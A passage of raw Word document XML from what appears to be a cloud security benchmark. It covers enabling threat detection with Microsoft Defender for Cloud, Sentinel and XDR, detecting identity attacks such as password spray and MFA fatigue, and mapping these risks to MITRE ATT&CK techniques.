    <w:p w14:paraId="2A3E03AF" w14:textId="1CDB8ADF" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t xml:space="preserve">resource hijacking (T1496) deploying </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C28FE">
        <w:t>cryptominers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C28FE">
        <w:t xml:space="preserve"> or computational abuse undetected by resource consumption anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56053FF6" w14:textId="136B307A" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-1.1: Enable threat detection for cloud services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D2096" w14:textId="5B8ACD09" w:rsidR="00B7417F" w:rsidRDefault="00B7417F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7417F">
        <w:t>Deploy native threat detection capabilities across all critical cloud services to identify malicious activities, anomalous behaviors, and known attack patterns through behavioral analytics and threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4FC5E" w14:textId="027BB5FE" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Use cloud-native threat detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FBA86" w14:textId="251DEC12" w:rsidR="00B7417F" w:rsidRPr="00B7417F" w:rsidRDefault="00B7417F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7417F">
        <w:t>Deploy the threat detection capabilities of your cloud security posture management platform for compute, storage, database, and identity services, providing behavioral analytics and threat intelligence-driven monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F65C4" w14:textId="7E3248E5" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Enable comprehensive service coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A855102" w14:textId="6F211555" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Activate threat detection for all critical Azure services using Microsoft Defender for Cloud, covering virtual machines, storage accounts, databases, containers, and Key Vault instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C59EFBE" w14:textId="50F0CECE" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Review detection capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E32CF03" w14:textId="54F6783C" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Familiarize security teams with available detection capabilities using the Microsoft Defender for Cloud security alerts reference guide to understand alert types, severity levels, and response requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF1CCE" w14:textId="024F88BA" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Address detection gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE4DC9B" w14:textId="37BF4070" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:lastRenderedPageBreak/>
        <w:t>For services without native threat detection capability, collect data plane logs and route to Microsoft Sentinel for custom analytics rules and behavioral detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB5123" w14:textId="4A8838D6" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Optimize alert quality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA2E10" w14:textId="3DA4B92B" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Configure alert filtering and analytics rules to reduce false positives and extract high-quality alerts from log data, tuning detection sensitivity based on workload criticality and risk tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C31BBA1" w14:textId="382259B1" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B123CA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-1.2: Enable advanced threat detection and analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7622C1" w14:textId="542AE741" w:rsidR="00B123CA" w:rsidRPr="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Enhance basic threat detection by centralizing security telemetry, deploying unified extended detection and response (XDR) platforms, and enriching alerts with threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B94AD" w14:textId="5F3395A6" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Centralize security telemetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59840596" w14:textId="04268ECA" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Aggregate alerts and log data from cloud security platforms, endpoint protection, identity systems, and application services into Azure Monitor or Microsoft Sentinel for unified analysis and correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ADBA8" w14:textId="34FB48A8" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Deploy unified XDR platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F391B7" w14:textId="7364D0D5" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Enable Microsoft Defender XDR to correlate threat detection across Microsoft 365 Defender (endpoints, email, collaboration), Microsoft Defender for Cloud (Azure infrastructure), and Microsoft Entra ID (identity) with cross-domain incident grouping and automated investigation workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFCECAC" w14:textId="1E7BC534" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Build custom detection rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0156BD" w14:textId="4960BBE8" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Create custom analytics rules matching organization-specific threat patterns, attack indicators, and business logic violations that pre-built detections cannot address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843F667" w14:textId="3A764B68" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Enrich with threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438C0CAD" w14:textId="742A9BEB" w:rsidR="00D32901" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Integrate Microsoft Defender Threat Intelligence to enrich alerts with threat actor attribution, infrastructure reputation, vulnerability exploitation intelligence, and compromised indicator correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72492C02" w14:textId="6ECDCABA" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Leverage threat indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC9E2B" w14:textId="1E87BABE" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t> Implement threat intelligence indicators in Microsoft Sentinel for automated matching of observables (IP addresses, domains, file hashes, URLs) against known malicious infrastructure and threat actor campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA06F5" w14:textId="77777777" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901"/>
    <w:p w14:paraId="21237015" w14:textId="77777777" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901"/>
    <w:p w14:paraId="09325AFC" w14:textId="7D65CFEB" w:rsidR="00D32901" w:rsidRDefault="00B123CA" w:rsidP="00B123CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc242449525"/>
      <w:r w:rsidRPr="00B123CA">
        <w:lastRenderedPageBreak/>
        <w:t>LT-2: Enable threat detection for identity and access management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="3285274F" w14:textId="7139ACEA" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FDF00" w14:textId="2A1387D9" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Monitor authentication and authorization events to detect compromised credentials, anomalous sign-in patterns, and account abuse. Identify behavioral anomalies including excessive authentication failures, impossible travel, deprecated account usage, and unauthorized privilege escalations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17F0E3" w14:textId="216B6C74" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B123CA">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F184B7C" w14:textId="03C70F85" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Credential compromise blindness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C691FFE" w14:textId="39AD7C63" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Stolen, leaked, or brute-forced credentials are used for extended periods (weeks to months) without detection because sign-in anomalies and risk scoring are absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E47C9ED" w14:textId="5852DF96" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Impossible travel undetected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F575B54" w14:textId="75768AAE" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t xml:space="preserve">Successful authentications from geographically distant locations within impossible timeframes indicate credential sharing or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B123CA">
        <w:t>compromise, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B123CA">
        <w:t xml:space="preserve"> proceed unmonitored without baseline analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A232918" w14:textId="560D7DD5" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Deprecated account exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B76697C" w14:textId="076C3C73" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Orphaned accounts, former employees, or unused service principals provide persistence footholds that attackers leverage to avoid user behavior scrutiny.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666701E7" w14:textId="0D38195B" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Privilege escalation silence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F40B8" w14:textId="71801081" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Attackers add themselves to administrative roles, create new privileged identities, or modify group memberships without triggering audit alerts or anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58703576" w14:textId="47343438" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Password spray success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890E909" w14:textId="3A190AAC" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Low-and-slow password guessing attacks avoid account lockout thresholds and evade detection absent aggregated authentication failure analytics across the tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431D4523" w14:textId="4C8DC633" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>MFA bypass techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAFA52" w14:textId="492C4B77" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Adversaries exploit legacy authentication protocols, session replay, or MFA fatigue attacks that succeed because risky sign-in behaviors aren't flagged or blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E27106" w14:textId="63F0EEEE" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Insider threat opacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D923B36" w14:textId="22ACA3D1" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Malicious insiders with legitimate credentials exfiltrate data or abuse privileged access while blending with normal activity patterns absent user behavior analytics (UBA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A27596" w14:textId="7EF388F5" w:rsidR="00B123CA" w:rsidRDefault="00B123CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF807F0" w14:textId="386C96D1" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D16A4E" w14:textId="13D5675F" w:rsidR="00B123CA" w:rsidRDefault="002C28FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:lastRenderedPageBreak/>
        <w:t>valid accounts (T1078) leveraging compromised credentials to gain initial entry appearing as legitimate authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C5238" w14:textId="117EAB9D" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4380872C" w14:textId="46C80A5E" w:rsidR="002C28FE" w:rsidRDefault="002C28FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C28FE">
        <w:t>brute force</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C28FE">
        <w:t xml:space="preserve"> (T1110) conducting password spray or credential stuffing attacks against user and service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD33BF9" w14:textId="77777777" w:rsidR="002C28FE" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB85D0" w14:textId="33E672EA" w:rsidR="00B123CA" w:rsidRDefault="002C28FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>unsecured credentials (T1552) harvesting leaked credentials from public breach databases or dark web sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753666AC" w14:textId="6D8C0251" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A3BEA7" w14:textId="41743481" w:rsidR="002C28FE" w:rsidRDefault="002C28FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>account manipulation (T1098) creating backdoor accounts, adding to privileged groups, or modifying authentication methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407CE6FC" w14:textId="379A5B6E" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF13B07" w14:textId="158DD79E" w:rsidR="002C28FE" w:rsidRDefault="002C28FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>valid accounts (T1078.004) abusing cloud accounts to escalate permissions or assume higher-privileged roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094DF19B" w14:textId="1DB9CED1" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAE974" w14:textId="41D2F67E" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>use alternate authentication material (T1550) leveraging tokens, cookies, or session artifacts to bypass MFA requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FFE72" w14:textId="04731C7D" w:rsidR="00B123CA" w:rsidRDefault="00B123CA" w:rsidP="00B7417F">
      <w:pPr>
